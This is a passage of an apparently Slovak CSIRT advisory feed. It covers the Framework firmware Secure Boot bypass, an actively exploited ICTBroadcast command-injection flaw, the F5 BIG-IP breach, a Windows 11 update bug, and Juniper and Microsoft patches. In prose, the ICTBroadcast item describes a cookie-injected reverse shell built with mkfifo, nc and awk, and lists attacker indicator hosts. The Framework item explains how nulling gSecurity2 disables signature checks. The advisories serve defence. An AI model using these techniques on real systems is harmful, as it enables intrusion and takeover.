		<guid isPermaLink="false">/?p=2914</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/10/Framework-Logo-1024x676.jpg" alt="" /></p>Výrobca modulárnych notebookov a&#160;desktopov Framework vydal bezpečnostné aktualizácie firmvéru svojich produktov, ktoré opravujú zraniteľnosť zneužiteľnú na inštaláciu bootkitov a&#160;získanie úplnej...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/10/Framework-Logo-1024x676.jpg" alt="" /></p>
<p><strong>Výrobca modulárnych notebookov a&nbsp;desktopov Framework vydal bezpečnostné aktualizácie firmvéru svojich produktov, ktoré opravujú zraniteľnosť zneužiteľnú na inštaláciu bootkitov a&nbsp;získanie úplnej kontroly nad systémom.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Framework 13 (11th Gen Intel) s&nbsp;firmvérom vo verzii staršej ako 3.24 (výrobca pracuje na aktualizácii)</li>



<li>Framework 13 (12th Gen Intel) s firmvérom vo verzii staršej ako 3.18 (3.19 pre verziu s DBX)</li>



<li>Framework 13 (13th Gen Intel) s firmvérom vo verzii staršej ako 3.08</li>



<li>Framework 13 (Intel Core Ultra) s firmvérom vo verzii staršej ako 3.06</li>



<li>Framework 13 (AMD Ryzen 7040) s firmvérom vo verzii staršej ako 3.16</li>



<li>Framework 13 (AMD Ryzen AI 300) s firmvérom vo verzii staršej ako 3.04 (3.05 pre verziu s DBX)</li>



<li>Framework 16 (AMD Ryzen 7040) s firmvérom vo verzii staršej ako 3.06 (Beta) (3.07 pre verziu s DBX)</li>



<li>Framework Desktop (AMD Ryzen AI 300 MAX) s firmvérom vo verzii staršej ako 3.01 (3.03 pre verziu s DBX)</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE identifikátor nebol pridelený</strong> (CVSSv3.1 skóre 7,1)<strong></strong></p>



<p>Zraniteľnosť firmvéru spočíva v&nbsp;možnosti prístupu k diagnostickému a debugovaciemu príkazu <em>mm</em> (memory modify), ktorý poskytuje priamy prístup k systémovej pamäti umožňujúci čítanie a zápis. Tento príkaz by útočník s fyzickým prístupom k zariadeniu mohol zneužiť na nastavenie premennej gSecurity2 na hodnotu NULL, čo by viedlo k <strong>deaktivácii mechanizmov overovania podpisov firmvéru (Secure Boot)</strong>. Útočník by následne mohol vykonať <strong>modifikáciu firmvéru</strong>, <strong>inštaláciu bootkitov</strong> a&nbsp;<strong>získať tak úplnú kontrolu nad systémom</strong>.</p>



<p>Pozn.: Zraniteľnosť objavili bezpečnostní výskumníci zo spoločnosti <a href="https://eclypsium.com/blog/bombshell-the-signed-backdoor-hiding-in-plain-sight-on-framework-devices/">Eclypsium</a>, ktorá ju eviduje pod aliasom BombShell.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Obídenie bezpečnostného prvku</strong></li>



<li><strong>Neoprávnená zmena v systéme</strong></li>



<li><strong>Získanie úplnej kontroly nad systémom</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Administrátorom a&nbsp;používateľom odporúčame vykonať aktualizáciu firmvéru zariadení na verzie špecifikované v&nbsp;časti „Zraniteľné systémy“ tohto varovania. V&nbsp;prípade, že aktualizáciu nie je možné vykonať, odporúčame limitovať fyzický prístup k&nbsp;zariadeniu alebo odstránenie DB kľúča prostredníctvom BIOS.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://eclypsium.com/blog/bombshell-the-signed-backdoor-hiding-in-plain-sight-on-framework-devices/">https://eclypsium.com/blog/bombshell-the-signed-backdoor-hiding-in-plain-sight-on-framework-devices/</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/secure-boot-bypass-risk-on-nearly-200-000-linux-framework-sytems/">https://www.bleepingcomputer.com/news/security/secure-boot-bypass-risk-on-nearly-200-000-linux-framework-sytems/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2914/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Automatický vytáčací systém ICTBroadcast obsahuje aktívne zneužívanú zraniteľnosť</title>
		<link>/posts/2918</link>
					<comments>/posts/2918#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 21 Oct 2025 14:31:50 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[ICT Innovations]]></category>
		<category><![CDATA[ICTBroadcast]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=2918</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/10/ICTBroadcast.png" alt="" /></p>Výskumníci z VulnCheck zverejnili informácie o aktívne zneužívanej kritickej zraniteľnosti v&#160;softvéri ICTBroadcast spoločnosti ICT Innovations, ktorý slúži na správu call...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/10/ICTBroadcast.png" alt="" /></p>
<p><strong>Výskumníci z VulnCheck zverejnili informácie o aktívne zneužívanej kritickej zraniteľnosti v&nbsp;softvéri ICTBroadcast spoločnosti ICT Innovations, ktorý slúži na správu call centier a&nbsp;automatické vytáčanie hovorov. CVE-2025-2611 možno zneužiť na injekciu shellových príkazov a&nbsp;získanie úplnej kontroly nad systémom.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>ICT Innovations ICTBroadcast vo všetkých verziách až po 7.4 (vrátane)</li>
</ul>



<p><strong>Opis zraniteľností:</strong></p>



<p>CVE-2025-2611(CVSSv4.0 skóre 9,3)</p>



<p>Kritická zraniteľnosť CVE-2025-2611 spočíva v nedostatočnom overovaní vstupov a vzdialený neautentifikovaný útočník by ich mohol zneužiť na <strong>vzdialenú injekciu shellových príkazov</strong> do relačných cookies BROADCAST, ktoré sa vykonajú na serveri. To môže viesť ku schopnosti vzdialene vykonávať kód bez autentifikácie.</p>



<p>Na uvedenú zraniteľnosť je dostupný proof of concept kód demonštrujúci mechanizmus jej zneužitia.</p>



<p>Zraniteľnosť objavil bezpečnostný výskumník <a href="https://github.com/Chocapikk">Valentin Lobstein</a> v&nbsp;marci 2025 a je <strong>aktívne zneužívaná</strong> minimálne od 11. októbra 2025. Útoky začínajú preverovaním prítomnosti zraniteľnosti, následne dochádza k&nbsp;jej zneužitiu na vytvorenie reverzného shellu. Škodlivý payload využíva príkazy mkfifo,&nbsp;nc, awk kódované v&nbsp;Base64 alebo príkazy Python kódované Base64 a&nbsp;komprimované prostredníctvom zlib. Súvisiace indikátory kompromitácie (IOC) v máji 2025 spoločnosť <a href="https://www.fortinet.com/blog/threat-research/multilayered-email-attack-how-a-pdf-invoice-and-geofencing-led-to-rat-malware">Fortinet</a> asociovala s e-mailovou kampaňou cielenou na Španielsko, Taliansko a&nbsp;Portugalsko, ktorá šírila malvér Ratty RAT.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialená injekcia príkazov</strong></li>



<li><strong>Vzdialené vykonanie kódu</strong></li>



<li><strong>Získanie plnej kontroly nad systémom</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p><strong>Na uvedenú zraniteľnosť v&nbsp;súčasnosti nie sú dostupné aktualizácie.</strong> Výskumníci do vydania záplat odporúčajú limitovať sieťový prístup k&nbsp;produktu len na dôveryhodné IP adresy alebo zaviesť sanitizáciu a&nbsp;overovanie obsahu session cookies. Taktiež odporúčame vykonať kontrolu logov sieťových a&nbsp;bezpečnostných prvkov na prítomnosť IOC.</p>



<p><strong>Indikátory kompromitácie (IOC):</strong></p>



<ul>
<li>*.localto[.]net</li>



<li>85sp9bexj.localto[.]net</li>



<li>143.47.53[.]106</li>



<li>86.104.249[.]106</li>
</ul>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://www.vulncheck.com/blog/ictbroadcast-kev">https://www.vulncheck.com/blog/ictbroadcast-kev</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-2611">https://nvd.nist.gov/vuln/detail/CVE-2025-2611</a></li>



<li><a href="https://thehackernews.com/2025/10/hackers-target-ictbroadcast-servers-via.html">https://thehackernews.com/2025/10/hackers-target-ictbroadcast-servers-via.html</a></li>



<li><a href="https://www.fortinet.com/blog/threat-research/multilayered-email-attack-how-a-pdf-invoice-and-geofencing-led-to-rat-malware">https://www.fortinet.com/blog/threat-research/multilayered-email-attack-how-a-pdf-invoice-and-geofencing-led-to-rat-malware</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2918/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Útočníci ukradli zdrojový kód a popisy zraniteľností F5 BIG-IP, aktualizujte ihneď!</title>
		<link>/posts/2912</link>
					<comments>/posts/2912#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 21 Oct 2025 14:23:06 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[BIG-IP]]></category>
		<category><![CDATA[Bypassing security features]]></category>
		<category><![CDATA[DoS]]></category>
		<category><![CDATA[F5]]></category>
		<category><![CDATA[information disclosure]]></category>
		<guid isPermaLink="false">/?p=2912</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/10/f5-1024x599.png" alt="" /></p>Spoločnosť F5 potvrdila, že sa stala obeťou kybernetického útoku, v rámci ktorého sa bližšie nešpecifikovanej štátom sponzorovanej skupine podarilo získať...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/10/f5-1024x599.png" alt="" /></p>
<p><strong>Spoločnosť </strong><strong>F5 potvrdila, že sa stala obeťou kybernetického útoku, v rámci ktorého sa bližšie nešpecifikovanej štátom sponzorovanej skupine podarilo získať dlhodobý prístup do ich systémov a exfiltrovať citlivé údaje, vrátane zdrojového kódu a&nbsp;konfigurácií časti zákazníkov.</strong></p>



<p><strong>Sumarizácia dostupných informácií:</strong></p>



<p><strong>Útočníci získali zdrojový kód a informácie o nahlásených zraniteľnostiach v produktoch BIG-IP</strong>, ktoré ešte neboli opravené ani zverejnené, a taktiež <strong>konfiguráciu a implementačné detaily obmedzeného počtu zákazníkov</strong>. <strong>Podľa dostupných informácií tieto údaje neboli zo strany útočníka zneužité ani zverejnené.</strong> Ku kompromitácii dodávateľského reťazca nedošlo, neboli zasiahnuté ani CRM, finančné systémy, zákaznícka podpora, systémy iHealth a systémy asociované s ostatnými produktovými radmi.</p>



<p><strong>F5 sa o incidente dozvedela 9. augusta 2025.</strong> Rieši ho v spolupráci s externými špecialistami zo spoločností Mandiant a&nbsp;Crowdstrike. Vykonala <a href="https://my.f5.com/manage/s/article/K000157005">rotáciu kryptografického materiálu</a> a prijala dodatočné opatrenia na zabezpečenie systémov. V spolupráci s NCC Group a IOActive bola vykonaná aj analýza rizík a zdrojového kódu.</p>



<p>Podľa portálu <a href="https://www.bloomberg.com/news/articles/2025-10-16/potentially-catastrophic-breach-of-cyber-firm-blamed-on-china">Bloomberg</a> <strong>systémy F5 kompromitovala čínska štátom sponzorovaná skupina UNC5221 malvérom BrickStorm a zotrvala v sieti vyše 12 mesiacov</strong>. Na aktivity tejto skupiny súvisiace so šírením BrickStorm <a href="https://cloud.google.com/blog/topics/threat-intelligence/brickstorm-espionage-campaign">koncom septembra 2025 upozornila GTIG</a> (Google Threat Intelligence Group). Spoločnosť Mandiant sprístupnila <a href="https://github.com/mandiant/brickstorm-scanner"><strong>skener</strong></a><strong> pre vyhľadávanie známych signatúr indikujúcich prítomnosť BrickStorm v systéme</strong>.</p>



<p><strong>F5 v súvislosti s útokom vydala </strong><strong>bezpečnostné aktualizácie pre svoje produkty BIG-IP, F5OS, BIG-IP Next for Kubernetes, BIG-IQ a APM klientov, ktoré opravujú 44 zraniteľností, vrátane tých uniknutých.</strong> 27 z nich bolo označených ako vysoko závažné.<strong> Konkrétne verzie zraniteľných produktov a&nbsp;odkazy na príslušné aktualizácie môžete nájsť na </strong><a href="https://my.f5.com/manage/s/article/K000156572"><strong>stránke výrobcu</strong></a><strong>.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>BIG-IP (všetky moduly)</li>



<li>BIG-IP AFM</li>



<li>BIG-IP APM, APM with SWG</li>



<li>BIG-IP ASM</li>



<li>BIG-IP PEM</li>



<li>BIG-IP SSL Orchestrator, SSL Orchestrator with SWG</li>



<li>BIG-IP Advanced WAF/ASM</li>



<li>BIG-IP Next CNF, Next SPK, Next for Kubernetes</li>



<li>F5OS-A</li>



<li>F5OS-C</li>



<li>F5 Silverline (všetky služby)</li>



<li>NGINX App Protect WAF</li>
</ul>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Eskalácia privilégií</strong></li>



<li><strong>Zneprístupnenie služby (DoS)</strong></li>



<li><strong>Obídenie bezpečnostných prvkov</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Administrátorom odporúčame bezodkladne:</p>



<ul>
<li><strong>aplikovať dodatočné odporúčania F5 </strong>súvisiace s:<ul><li><a href="https://my.f5.com/manage/s/article/K53108777"><strong>hardeningom</strong></a><strong> zariadení</strong></li></ul><ul><li><strong>kontrolou integrity pomocou diagnostického nástroja </strong><a href="https://www.f5.com/support/f5-ihealth"><strong>F5 iHealth</strong></a><strong></strong></li></ul><ul><li><strong>zavedením detailného </strong><a href="https://my.f5.com/manage/s/article/K13080"><strong>logovania</strong></a><strong> a </strong><a href="https://my.f5.com/manage/s/article/K13426"><strong>monitoringu</strong></a></li></ul>
<ul>
<li><strong>threat huntingom a&nbsp;analýzou dostupných logov </strong>na identifikáciu pokusov o&nbsp;zneužitie zraniteľností alebo útokov na produkty F5. Použite aj <a href="https://github.com/mandiant/brickstorm-scanner">BrickStorm scanner</a> od Mandiant a&nbsp;<a href="https://rulezet.org/bundle/detail/5">SIGMA pravidlá</a> od CIRCL.LU.</li>
</ul>
</li>



<li><strong>vykonať aktualizáciu všetkých identifikovaných produktov</strong> na <a href="https://my.f5.com/manage/s/article/K000156572">verzie</a> špecifikované výrobcom</li>



<li><strong>v&nbsp;prípade produktov s&nbsp;ukončenou podporou urýchlene zmigrovať na alternatívne produktys&nbsp;platnou podporou</strong></li>



<li><strong>limitovať dostupnosť administratívnych rozhraní </strong>produktov len z dôveryhodných IP adries<strong></strong></li>
</ul>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://my.f5.com/manage/s/article/K000154696">https://my.f5.com/manage/s/article/K000154696</a></li>



<li><a href="https://my.f5.com/manage/s/article/K000157005">https://my.f5.com/manage/s/article/K000157005</a></li>



<li><a href="https://my.f5.com/manage/s/article/K000156572">https://my.f5.com/manage/s/article/K000156572</a></li>



<li><a href="https://www.f5.com/support/f5-ihealth">https://www.f5.com/support/f5-ihealth</a></li>



<li><a href="https://my.f5.com/manage/s/article/K13080">https://my.f5.com/manage/s/article/K13080</a></li>



<li><a href="https://my.f5.com/manage/s/article/K13426">https://my.f5.com/manage/s/article/K13426</a></li>



<li><a href="https://www.cisa.gov/news-events/directives/ed-26-01-mitigate-vulnerabilities-f5-devices">https://www.cisa.gov/news-events/directives/ed-26-01-mitigate-vulnerabilities-f5-devices</a></li>



<li><a href="https://www.sec.gov/Archives/edgar/data/1048695/000104869525000149/ffiv-20251015.htm">https://www.sec.gov/Archives/edgar/data/1048695/000104869525000149/ffiv-20251015.htm</a></li>



<li><a href="https://www.bloomberg.com/news/articles/2025-10-16/potentially-catastrophic-breach-of-cyber-firm-blamed-on-china">https://www.bloomberg.com/news/articles/2025-10-16/potentially-catastrophic-breach-of-cyber-firm-blamed-on-china</a></li>



<li><a href="https://cloud.google.com/blog/topics/threat-intelligence/brickstorm-espionage-campaign">https://cloud.google.com/blog/topics/threat-intelligence/brickstorm-espionage-campaign</a></li>



<li><a href="https://github.com/mandiant/brickstorm-scanner">https://github.com/mandiant/brickstorm-scanner</a></li>



<li><a href="https://rulezet.org/bundle/detail/5">https://rulezet.org/bundle/detail/5</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2912/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Októbrová aktualizácia Windows 11 znemožňuje aplikáciám prístup na localhost</title>
		<link>/posts/2906</link>
					<comments>/posts/2906#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 20 Oct 2025 12:13:42 +0000</pubDate>
				<category><![CDATA[Aktualita]]></category>
		<category><![CDATA[Aktuality]]></category>
		<category><![CDATA[aktualizácia]]></category>
		<category><![CDATA[localhost]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[update]]></category>
		<category><![CDATA[Windows]]></category>
		<guid isPermaLink="false">/?p=2906</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/12/MicrosoftLogo-4238232498.jpg" alt="" /></p>Aktuálna situácia: Kumulatívna aktualizácia 2025-10, 64-bitového operačného systému WINDOWS 11 znemožňuje vytvorenie HTTP spojenia s LOCALHOST adresou 127.0.0.1, čo narúša...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/12/MicrosoftLogo-4238232498.jpg" alt="" /></p>
<h2 class="wp-block-heading"></h2>



<p><strong>Aktuálna situácia:</strong></p>



<p>Kumulatívna aktualizácia 2025-10, 64-bitového operačného systému WINDOWS 11 znemožňuje vytvorenie HTTP spojenia s LOCALHOST adresou 127.0.0.1, čo narúša činnosť viacerých aplikácií. Nie je možné napríklad lokálne ladenie v nástroji Visual Studio, autentifikovať sa prostredníctvom SSMS Entra ID a Cisco Duo Desktop, ktoré počas svojej činnosti vyžadujú komunikáciu s komponentmi dostupnými prostredníctvom LOCALHOST. </p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Windows 11 24H2 aktualizácia KB5066835</li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Pre dočasné odstránenie problému sa odporúča odinštalovanie aktualizácie KB5066835. V&nbsp;prípade, že odstránenie spomínanej aktualizácie nebude možné, odporúča sa odinštalovať aj aktualizáciu KB5065789 spolu s KB5066835.<strong><br></strong></p>



<p><strong><mark style="background-color:rgba(0, 0, 0, 0)" class="has-inline-color has-vivid-red-color">POZOR:</mark></strong> Spoločnosť Microsoft sa zatiaľ k&nbsp;problematickej aktualizácii nevyjadrila a&nbsp;navrhované riešenia problému sú zatiaľ provizórne, pretože pochádzajú od užívateľov zasiahnutých verzií operačného systému, preto môžu mať aj značný dopad na kybernetickú bezpečnosť. <strong>Administrátorom odporúčame vykonať kroky na mitigáciu iba ak to je nevyhnutné</strong>, a&nbsp;naďalej sledovať aktualizáciu celej situácie od spoločnosti Microsoft.</p>



<p><strong>Zdroje</strong></p>



<ul>
<li><a href="https://stackoverflow.com/questions/79790827/localhost-applications-failing-after-installing-2025-10-cumulative-update-for-w">https://stackoverflow.com/questions/79790827/localhost-applications-failing-after-installing-2025-10-cumulative-update-for-w</a></li>



<li><a href="https://help.duo.com/s/article/9527?language=en_US">https://help.duo.com/s/article/9527?language=en_US</a></li>



<li><a href="https://learn.microsoft.com/en-us/answers/questions/5585563/localhost-not-working-anymore-after-2025-10-cumula">https://learn.microsoft.com/en-us/answers/questions/5585563/localhost-not-working-anymore-after-2025-10-cumula</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2906/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Juniper Networks vydáva veľký balík bezpečnostných opráv</title>
		<link>/posts/2904</link>
					<comments>/posts/2904#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Thu, 16 Oct 2025 15:37:39 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[DoS]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[Juniper]]></category>
		<category><![CDATA[Junos OS]]></category>
		<category><![CDATA[Junos Space]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=2904</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/03/Juniper_Networks-Logo.wine_-1024x683.png" alt="" /></p>Spoločnosť Juniper Networks opravila zhruba 220 zraniteľností vo svojich produktoch Junos OS, Junos Space a Junos Space Security Director. 9...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/03/Juniper_Networks-Logo.wine_-1024x683.png" alt="" /></p>
<p><strong>Spoločnosť Juniper Networks opravila zhruba 220 zraniteľností vo svojich produktoch</strong> <strong>Junos OS, Junos Space a Junos Space Security Director. 9 z&nbsp;nich je kritických.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Junos OS, verzie staršie ako 23.4R2-S5, 24.2R2-S1, 24.4R1-S3, 24.4R2 a 25.2R1</li>



<li>Junos OS Evolved, verzie staršie ako 23.4R2-S5-EVO, 24.2R2-S1-EVO, 24.4R1-S3-EVO, 24.4R2-EVO, 25.2R1-EVO</li>



<li>Junos Space, verzie staršie ako 24.1R4</li>



<li>Junos Space Security Director, verzie staršie ako 24.1R4</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p>Spoločnosť Juniper Networks vydala bezpečnostné aktualizácie pre svoje produkty Junos OS, Junos OS Evolved, Junos Space a Junos Space Security Director, ktoré opravujú zhruba 220 zraniteľností, z čoho 9 v Junos Space je označených ako kritické. Popis niektorých z najzávažnejších nájdete nižšie.</p>



<p><strong><u>Junos Space:</u></strong></p>



<p><strong>CVE-2025-59978 </strong>(CVSS skóre 9,0)</p>



<p>Kritická zraniteľnosť v Junos Space, ktorá umožňuje ukladanie skriptových tagov v rámci textu na stránkach. Útočník tak môže vykonávať útoky typu XSS a spôsobiť vykonanie skriptov a príkazov na zariadení návštevníka škodlivej alebo kompromitovanej stránky, s oprávneniami administrátora.</p>



<p><strong>CVE-2019-12900, CVE-2023-38408, CVE-2024-3596, CVE-2024-27280, CVE-2024-35845, CVE-2024-47538, CVE-2024-47607, CVE-2024-47615</strong></p>



<p>Ostatné kritické zraniteľnosti opravené v októbri.</p>



<p>Medzi ďalšími opravených zraniteľnosťami bola vysoko závažná umožňujúca narušiť dostupnosť služby a stredne závažná dovoľujúca sťahovanie ľubovoľných súborov.</p>



<p><strong><u>Junos OS:</u></strong></p>



<p><strong>CVE-2025-59964, CVE-2025-60004 </strong>(CVSS skóre 7,5)</p>



<p>V systémoch Junos OS a Junos OS Evolved boli okrem iného opravené dve vysoko závažné zraniteľnosti umožňujúce narušenie dostupnosti služby. Prvá súvisí s použitím neinicializovaného zdroja v komponente Packet Forwarding Engine (PFE). Druhú spôsobuje nevhodná kontrola výnimočných podmienok v komponente routing protocol daemon (rpd)<strong>.</strong></p>



<p><strong><u>Junos Space Security Director:</u></strong></p>



<p><strong>CVE-2025-59968 </strong>(CVSS skóre 8,6)</p>



<p>Vysoko závažná zraniteľnosť súvisí s chýbajúcou autorizáciou. Neautentifikovaný útočník na sieti tak môže cez webové rozhranie čítať a upravovať metadáta.</p>



<p><strong>CVE-2025-59974 </strong>(CVSS skóre 8,4)</p>



<p>Vysoko závažná zraniteľnosť vzniká kvôli nevhodnej sanitizácii používateľských vstupov. To dovoľuje injektovať a ukladať skripty do aplikácie, ktoré sa vykonajú v kontexte prehliadača obete (uložené XSS).</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Únik citlivých informácií</strong></li>



<li><strong>Nedostupnosť služby (DoS)</strong></li>



<li><strong>Vzdialené vykonávanie kódu</strong></li>



<li><strong>Kompromitácia systému</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácia aspoň na verzie:</p>



<ul>
<li>Junos OS 23.4R2-S5, 24.2R2-S1, 24.4R1-S3, 24.4R2 alebo 25.2R1</li>



<li>Junos OS Evolved 23.4R2-S5-EVO, 24.2R2-S1-EVO, 24.4R1-S3-EVO, 24.4R2-EVO alebo 25.2R1-EVO</li>



<li>Junos Space 24.1R4</li>



<li>Junos Space Security Director 24.1R4</li>
</ul>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://www.securityweek.com/juniper-networks-patches-critical-junos-space-vulnerabilities/">https://www.securityweek.com/juniper-networks-patches-critical-junos-space-vulnerabilities/</a></li>



<li><a href="https://supportportal.juniper.net/s/global-search/%40uri#sortCriteria=date%20descending&amp;f-sf_primarysourcename=Knowledge&amp;f-sf_articletype=Security%20Advisories&amp;numberOfResults=25">https://supportportal.juniper.net/s/global-search/%40uri#sortCriteria=date%20descending&amp;f-sf_primarysourcename=Knowledge&amp;f-sf_articletype=Security%20Advisories&amp;numberOfResults=25</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2904/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Microsoft v októbrovom balíku aktualizácií Patch Tuesday opravil 6 aktívne zneužívaných zraniteľností</title>
		<link>/posts/2902</link>
					<comments>/posts/2902#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Wed, 15 Oct 2025 11:03:31 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[Patch Tuesday]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<guid isPermaLink="false">/?p=2902</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/12/MicrosoftLogo-4238232498.jpg" alt="" /></p>Spoločnosť Microsoft vydala v októbri 2025 balík opráv pre portfólio svojich produktov opravujúci 172 zraniteľností, z&#160;ktorých 8 spoločnosť označila ako...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/12/MicrosoftLogo-4238232498.jpg" alt="" /></p>
<p><strong>Spoločnosť Microsoft vydala v októbri 2025 balík opráv pre portfólio svojich produktov opravujúci 172 zraniteľností, z&nbsp;ktorých 8 spoločnosť označila ako kritické. Tieto umožňujú vzdialene vykonávať kód a eskalovať oprávnenia. Šesť zraniteľností je aktívne zneužívaných.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>.NET 8.0 installed on Linux</li>



<li>.NET 8.0 installed on Mac OS</li>



<li>.NET 8.0 installed on Windows</li>



<li>.NET 9.0 installed on Linux</li>



<li>.NET 9.0 installed on Mac OS</li>



<li>.NET 9.0 installed on Windows</li>



<li>Arc Enabled Servers &#8211; Azure Connected Machine Agent</li>



<li>ASP.NET Core 2.3</li>



<li>ASP.NET Core 8.0</li>



<li>ASP.NET Core 9.0</li>



<li>Azure Compute Gallery</li>



<li>Azure Monitor Agent</li>



<li>Microsoft .NET Framework 2.0 Service Pack 2</li>



<li>Microsoft .NET Framework 3.0 Service Pack 2</li>



<li>Microsoft .NET Framework 3.5</li>



<li>Microsoft .NET Framework 3.5 AND 4.7.2</li>



<li>Microsoft .NET Framework 3.5 AND 4.8</li>



<li>Microsoft .NET Framework 3.5 AND 4.8.1</li>



<li>Microsoft .NET Framework 3.5.1</li>



<li>Microsoft .NET Framework 4.6.2</li>



<li>Microsoft .NET Framework 4.6.2/4.7/4.7.1/4.7.2</li>



<li>Microsoft .NET Framework 4.8</li>



<li>Microsoft 365 Apps for Enterprise for 32-bit Systems</li>



<li>Microsoft 365 Apps for Enterprise for 64-bit Systems</li>



<li>Microsoft Access 2016 (32-bit edition)</li>



<li>Microsoft Access 2016 (64-bit edition)</li>



<li>Microsoft Configuration Manager 2403</li>



<li>Microsoft Configuration Manager 2409</li>



<li>Microsoft Configuration Manager 2503</li>



<li>Microsoft Defender for Endpoint for Linux</li>



<li>Microsoft Excel 2016 (32-bit edition)</li>



<li>Microsoft Excel 2016 (64-bit edition)</li>



<li>Microsoft Exchange Server 2016 Cumulative Update 23</li>



<li>Microsoft Exchange Server 2019 Cumulative Update 14</li>



<li>Microsoft Exchange Server 2019 Cumulative Update 15</li>



<li>Microsoft Exchange Server Subscription Edition RTM</li>



<li>Microsoft JDBC Driver 10.2 for SQL Server</li>



<li>Microsoft JDBC Driver 11.2 for SQL Server</li>



<li>Microsoft JDBC Driver 12.10 for SQL Server</li>



<li>Microsoft JDBC Driver 12.2 for SQL Server</li>



<li>Microsoft JDBC Driver 12.4 for SQL Server</li>



<li>Microsoft JDBC Driver 12.6 for SQL Server</li>



<li>Microsoft JDBC Driver 12.8 for SQL Server</li>



<li>Microsoft JDBC Driver 13.2 for SQL Server</li>



<li>Microsoft Office 2016 (32-bit edition)</li>



<li>Microsoft Office 2016 (64-bit edition)</li>



<li>Microsoft Office 2019 for 32-bit editions</li>



<li>Microsoft Office 2019 for 64-bit editions</li>



<li>Microsoft Office for Android</li>



<li>Microsoft Office LTSC 2021 for 32-bit editions</li>



<li>Microsoft Office LTSC 2021 for 64-bit editions</li>



<li>Microsoft Office LTSC 2024 for 32-bit editions</li>



<li>Microsoft Office LTSC 2024 for 64-bit editions</li>



<li>Microsoft Office LTSC for Mac 2021</li>



<li>Microsoft Office LTSC for Mac 2024</li>



<li>Microsoft PowerPoint 2016 (32-bit edition)</li>



<li>Microsoft PowerPoint 2016 (64-bit edition)</li>



<li>Microsoft SharePoint Enterprise Server 2016</li>



<li>Microsoft SharePoint Server 2019</li>



<li>Microsoft SharePoint Server Subscription Edition</li>



<li>Microsoft Visual Studio 2017 version 15.9 (includes 15.0 &#8211; 15.8)</li>



<li>Microsoft Visual Studio 2019 version 16.11 (includes 16.0 &#8211; 16.10)</li>



<li>Microsoft Visual Studio 2022 version 17.10</li>



